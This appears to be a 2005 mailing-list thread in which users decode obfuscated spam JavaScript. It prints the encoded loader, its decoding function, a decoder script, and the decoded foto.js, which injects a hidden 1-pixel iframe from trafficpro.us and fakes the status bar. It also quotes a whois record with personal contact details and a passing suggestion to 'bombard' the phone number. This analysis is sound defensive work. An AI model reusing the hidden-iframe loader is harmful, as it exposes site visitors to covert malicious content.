Re: decyphering spam

2005-06-03 Thread michael
It seems this spam leads to trafficpro.us which is registered by
somebody in UK (see below) - do you think it's worth reporting or taking
legal action? I guess we could just bombard their phone number

[EMAIL PROTECTED]:/tmp$ whois trafficpro.us |less
Domain Name: TRAFFICPRO.US
Domain ID:   D7444563-US
Sponsoring Registrar:SCHLUND + PARTNER AG
Domain Status:   ok
Registrant ID:   SPAG-4476
Registrant Name: Julie Prescott
Registrant Address1: Orchard Terrace
Registrant Address2: 8
Registrant City: York
Registrant Postal Code:  YO51 9AF
Registrant Country:  Great Britain (UK)
Registrant Country Code: GB
Registrant Phone Number: +44.1614315155
Registrant Email:[EMAIL PROTECTED]
Registrant Application Purpose:  P1
Registrant Nexus Category:   C11
Administrative Contact ID:   SPAG-4476
Administrative Contact Name: Julie Prescott
Administrative Contact Address1: Orchard Terrace
Administrative Contact Address2: 8
Administrative Contact City: York
Administrative Contact Postal Code:  YO51 9AF
Administrative Contact Country:  Great Britain (UK)
Administrative Contact Country Code: GB
Administrative Contact Phone Number: +44.1614315155
{etc}


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED] 
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Re: decyphering spam

2005-06-03 Thread Dave Howorth

michael wrote:

> It seems this spam leads to trafficpro.us which is registered by
> somebody in UK (see below) - do you think it's worth reporting or taking
> legal action? I guess we could just bombard their phone number


Or perhaps do a little research first?

The registrant claims to be in York.

The phone number is nowhere near York. It apparently belongs to a 
company in Stockport called Railweight

http://www.touchstockport.com/business/list/bid/2964798

The postcode YO51 9AF isn't in York either and isn't on Orchard Terrace.
http://www.multimap.com/map/browse.cgi?client=publicX=439500Y=466750width=700height=400gride=439511gridn=466700srec=0coordsys=gbdb=pcaddr1=addr2=addr3=pc=advanced=local=localinfosel=kw=inmap=table=ovtype=zm=0in.x=6in.y=11scale=5000

Cheers, Dave









Re: decyphering spam

2005-06-03 Thread michael
On Fri, 2005-06-03 at 10:05 +0100, Dave Howorth wrote:
> michael wrote:
> > It seems this spam leads to trafficpro.us which is registered by
> > somebody in UK (see below) - do you think it's worth reporting or taking
> > legal action? I guess we could just bombard their phone number
>
> Or perhaps do a little research first?
>
> The registrant claims to be in York.
>
> The phone number is nowhere near York. It apparently belongs to a
> company in Stockport called Railweight
> http://www.touchstockport.com/business/list/bid/2964798
>
> The postcode YO51 9AF isn't in York either and isn't on Orchard Terrace.
> http://www.multimap.com/map/browse.cgi?client=publicX=439500Y=466750width=700height=400gride=439511gridn=466700srec=0coordsys=gbdb=pcaddr1=addr2=addr3=pc=advanced=local=localinfosel=kw=inmap=table=ovtype=zm=0in.x=6in.y=11scale=5000
>

I did read it and wonder about the phone number being Manchester, even
rang it up but only heard gossiping! 

I guess you're implying that trafficpro.us have fake 'whois'
credentials? In which case should a complaint be made to nominet
(other?) to get their domain removed?





Re: decyphering spam

2005-06-03 Thread David Goodenough
On Friday 03 June 2005 10:19, michael wrote:
> On Fri, 2005-06-03 at 10:05 +0100, Dave Howorth wrote:
> > michael wrote:
> > > It seems this spam leads to trafficpro.us which is registered by
> > > somebody in UK (see below) - do you think it's worth reporting or
> > > taking legal action? I guess we could just bombard their phone number
> >
> > Or perhaps do a little research first?
> >
> > The registrant claims to be in York.
> >
> > The phone number is nowhere near York. It apparently belongs to a
> > company in Stockport called Railweight
> > http://www.touchstockport.com/business/list/bid/2964798
> >
> > The postcode YO51 9AF isn't in York either and isn't on Orchard Terrace.
> > http://www.multimap.com/map/browse.cgi?client=publicX=439500Y=466750width=700height=400gride=439511gridn=466700srec=0coordsys=gbdb=pcaddr1=addr2=addr3=pc=advanced=local=localinfosel=kw=inmap=table=ovtype=zm=0in.x=6in.y=11scale=5000
>
> I did read it and wonder about the phone number being Manchester, even
> rang it up but only heard gossiping!
>
> I guess you're implying that trafficpro.us have fake 'whois'
> credentials? In which case should a complaint be made to nominet
> (other?) to get their domain removed?

Nominet are not responsible for .us, only .uk.  The registrar seems to be
someone in Germany.

David





decyphering spam

2005-06-02 Thread michael
how do i decypher what the following HTML/javascript attempts (original
'write' was all one line)?

<html>
<head>


<body bgcolor=#080C25>

<script language=javascript>document.write(unescape('%3C%53%43%52%49%50%
54%20%4C%41%4E%47%55%41%47%45%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%
64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%65%6D%70%74%79%2E%2E%27%
29%3B%3C%2F%53%43%52%49%50%54%3E%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%
61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%
6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%
73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%
20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%
65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%
43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%
29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%
29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%
65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%
3E'));dF('*8HXHWNUY*75QFSLZFLJ*8I*77of%
7Bfxhwnuy*77*75XWH*8I*77ktyt3ox*77*8J*5I*5F44*75XFRUQJ*75XHWNUY*75*787*752*75HFQQNSL*75FS*75J%5DYJWSFQ*75OX*75KNQJ*5I*5F*8H4XHWNUY*8J*5I*5F5')</script>

</body>
</html>

-- 
Michael Bane
Atmospheric Physics Group
University of Manchester





Re: decyphering spam

2005-06-02 Thread Steve Lamb
michael wrote:
> how do i decypher what the following HTML/javascript attempts (original
> 'write' was all one line)?

Personally, I used Python's urllib.unquote and got the following:

<SCRIPT LANGUAGE="javascript">document.write('empty..');</SCRIPT><script
language="javascript">function dF(s){var s1=unescape(s.substr(0,s.length-1));
var
t='';for(i=0;i<s1.length;i++)t+=String.fromCharCode(s1.charCodeAt(i)-s.substr(s.length-1,1));document.write(unescape(t));}</script>

> dF('*8HXHWNUY*75QFSLZFLJ*8I*77of%
> 7Bfxhwnuy*77*75XWH*8I*77ktyt3ox*77*8J*5I*5F44*75XFRUQJ*75XHWNUY*75*787*752*75HFQQNSL*75FS*75J%5DYJWSFQ*75OX*75KNQJ*5I*5F*8H4XHWNUY*8J*5I*5F5')</script>

Which is then fed the above segment to decode.  Don't feel like digging
into the above javascript to make a Python equivalent decoder for that
section.  Maybe someone else will jump in?  :D

--
 Steve C. Lamb | I'm your priest, I'm your shrink, I'm your
   PGP Key: 8B6E99C5   | main connection to the switchboard of souls.
---+-




Re: decyphering spam

2005-06-02 Thread Ron Johnson
On Thu, 02 Jun 2005 21:18:47 +0100
michael [EMAIL PROTECTED] wrote:

> how do i decypher what the following HTML/javascript attempts (original
> 'write' was all one line)?
 


Each of the %xy groups is a % followed by a byte described in
hexadecimal.  A little Perl or Python script should be able to
decipher it for you pretty quick.


-- 
-
Ron Johnson, Jr.
Jefferson, LA  USA
PGP Key ID 8834C06B I prefer encrypted mail.

Observe good faith and justice toward all nations. Cultivate
peace and harmony with all.
George Washington





Re: decyphering spam

2005-06-02 Thread Darryl Clarke
On 6/2/05, Steve Lamb [EMAIL PROTECTED] wrote:
> michael wrote:
> > how do i decypher what the following HTML/javascript attempts (original
> > 'write' was all one line)?
>
> Personally, I used Python's urllib.unquote and got the following:
>
> <SCRIPT LANGUAGE="javascript">document.write('empty..');</SCRIPT><script
> language="javascript">function dF(s){var s1=unescape(s.substr(0,s.length-1));
> var
> t='';for(i=0;i<s1.length;i++)t+=String.fromCharCode(s1.charCodeAt(i)-s.substr(s.length-1,1));document.write(unescape(t));}</script>
>
> > dF('*8HXHWNUY*75QFSLZFLJ*8I*77of%
> > 7Bfxhwnuy*77*75XWH*8I*77ktyt3ox*77*8J*5I*5F44*75XFRUQJ*75XHWNUY*75*787*752*75HFQQNSL*75FS*75J%5DYJWSFQ*75OX*75KNQJ*5I*5F*8H4XHWNUY*8J*5I*5F5')</script>
>
> Which is then fed the above segment to decode.  Don't feel like digging
> into the above javascript to make a Python equivalent decoder for that
> section.  Maybe someone else will jump in?  :D
>

That final segment decodes to this:
 
<SCRIPT LANGUAGE="javascript" SRC="foto.js"> // SAMPLE SCRIPT #2 -
CALLING AN EXTERNAL JS FILE </SCRIPT>

which, unless there was a base reference issued in the actual spam,
leads nowhere. :)

--
~ Darryl  ~ [EMAIL PROTECTED]
http://smartssa.com / http://darrylclarke.com



Re: decyphering spam

2005-06-02 Thread Nicos Gollan
On Thursday June 2 2005 22:18, michael wrote:
> how do i decypher what the following HTML/javascript attempts (original
> 'write' was all one line)?

First, you shove it through that Perl script with the line intact (isn't 
downloading Videos from secure pages fun...):

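#!/usr/bin/perl -w

use strict;

# Prints only the bytes decoded from %XX groups; text outside a %XX
# group is not echoed to the output.
foreach (<STDIN>) {
    s/\%([0-9a-fA-F]{1,2})/print STDOUT chr(hex($1))/ge;
}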

Afterwards, you search the resulting JavaScript fragment for what the dF 
function actually does. It decodes to this:

<SCRIPT LANGUAGE="javascript">document.write('empty..');</SCRIPT>
<script language="javascript">
function dF(s){
  var s1=unescape(s.substr(0,s.length-1));
  var t= '';
  for(i=0;i<s1.length;i++)
    t += String.fromCharCode(
      s1.charCodeAt(i)-s.substr(s.length-1,1) );
  document.write(unescape(t));}
</script>{]

Have fun. I found that it's actually pretty simple to just re-implement 
whatever it does in a programming language of your choice and just dump 
everything to stdout.

-- 
Got Backup?

Jabber: Shadowdancer at jabber.fsinf.de
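
A Python equivalent of dF, of the kind Steve Lamb and Nicos Gollan describe above, added here as an example (it is not code posted by anyone in the thread). The function names are made up for the example; the sample string is the dF argument quoted in the thread, and the decoding is static, so nothing is rendered or fetched.

```python
import re

# Sample input: the dF(...) call as quoted in the thread, including the line
# break the mailer inserted after "of%" (the original was all one line).
SAMPLE = ("dF('*8HXHWNUY*75QFSLZFLJ*8I*77of%\n"
          "7Bfxhwnuy*77*75XWH*8I*77ktyt3ox*77*8J*5I*5F44*75XFRUQJ*75XHWNUY"
          "*75*787*752*75HFQQNSL*75FS*75J%5DYJWSFQ*75OX*75KNQJ*5I*5F*8H4XHWNUY"
          "*8J*5I*5F5')")

_ESC = re.compile(r"%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})")

def js_unescape(s):
    """Equivalent of JavaScript unescape(): one pass over %XX and %uXXXX."""
    return _ESC.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), s)

def find_df_args(source):
    """Return each dF('...') argument with mail line wrapping removed."""
    return [re.sub(r"[\r\n]+", "", a)
            for a in re.findall(r"dF\('([^']*)'\)", source)]

def decode_df(arg):
    """Re-implement dF(s) statically: the result is returned, never rendered."""
    if len(arg) < 2 or arg[-1] not in "0123456789":
        raise ValueError("expected payload followed by a one-digit shift key")
    key = int(arg[-1])                  # s.substr(s.length-1,1)
    shifted = js_unescape(arg[:-1])     # unescape(s.substr(0,s.length-1))
    # String.fromCharCode(code - key); fromCharCode wraps modulo 2**16
    plain = "".join(chr((ord(c) - key) % 0x10000) for c in shifted)
    return js_unescape(plain)           # the unescape(t) given to document.write

def script_sources(html):
    """List the src attribute of every <script> tag in the decoded markup."""
    return re.findall(r"""<script\b[^>]*\bsrc\s*=\s*["']?([^"'\s>]+)""",
                      html, re.I)

if __name__ == "__main__":
    for arg in find_df_args(SAMPLE):
        decoded = decode_df(arg)
        print(repr(decoded))
        print("external scripts:", script_sources(decoded))
```

The last character of the argument is the shift key (5 here), which is why the payload looks like shifted percent-escapes: "*" is "%" moved up by five.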




Re: decyphering spam

2005-06-02 Thread michael
On Thu, 2005-06-02 at 17:06 -0400, Darryl Clarke wrote:
> On 6/2/05, Steve Lamb [EMAIL PROTECTED] wrote:
> > michael wrote:
> > > how do i decypher what the following HTML/javascript attempts (original
> > > 'write' was all one line)?
> >
> > Personally, I used Python's urllib.unquote and got the following:
> >
> > <SCRIPT LANGUAGE="javascript">document.write('empty..');</SCRIPT><script
> > language="javascript">function dF(s){var
> > s1=unescape(s.substr(0,s.length-1));
> > var
> > t='';for(i=0;i<s1.length;i++)t+=String.fromCharCode(s1.charCodeAt(i)-s.substr(s.length-1,1));document.write(unescape(t));}</script>
> >
> > > dF('*8HXHWNUY*75QFSLZFLJ*8I*77of%
> > > 7Bfxhwnuy*77*75XWH*8I*77ktyt3ox*77*8J*5I*5F44*75XFRUQJ*75XHWNUY*75*787*752*75HFQQNSL*75FS*75J%5DYJWSFQ*75OX*75KNQJ*5I*5F*8H4XHWNUY*8J*5I*5F5')</script>
> >
> > Which is then fed the above segment to decode.  Don't feel like digging
> > into the above javascript to make a Python equivalent decoder for that
> > section.  Maybe someone else will jump in?  :D
> >
>
> That final segment decodes to this:
>
> <SCRIPT LANGUAGE="javascript" SRC="foto.js"> // SAMPLE SCRIPT #2 -
> CALLING AN EXTERNAL JS FILE </SCRIPT>
>
> which, unless there was a base reference issued in the actual spam,
> leads nowhere. :)
>

well i can 'wget' the foto.js from the site which is (if anybody is
interested!) a bit too simple to decode but those up for the challenge
could decypher the index.php

url = http://www.trafficpro.us/index.php;;
qwe = ' di'+'spl'+'ay:n'+'one'+';}/s'+'ty'+'le';
rty = ' FR'+'AMEB'+'ORD'+'ER=0 WIDTH=1 HEIGHT=1'+'0%
/I'+'F'+'RA'+'ME';
uio = 's'+'tyl'+'e type=text/css';
asd = 'IF'+'RA'+'ME SRC=';
fgh = ' .t'+'ex'+'t {vi'+'sib'+'ili'+'ty:h'+'idd'+'en;';
a = asd+url+rty;
b = uio+fgh+qwe;
document.write (a);
document.write (b);
self.focus();
setInterval(window.status='google.com',7);



> --
> ~ Darryl  ~ [EMAIL PROTECTED]
> http://smartssa.com / http://darrylclarke.com
>
-- 
Michael Bane
Atmospheric Physics Group
University of Manchester

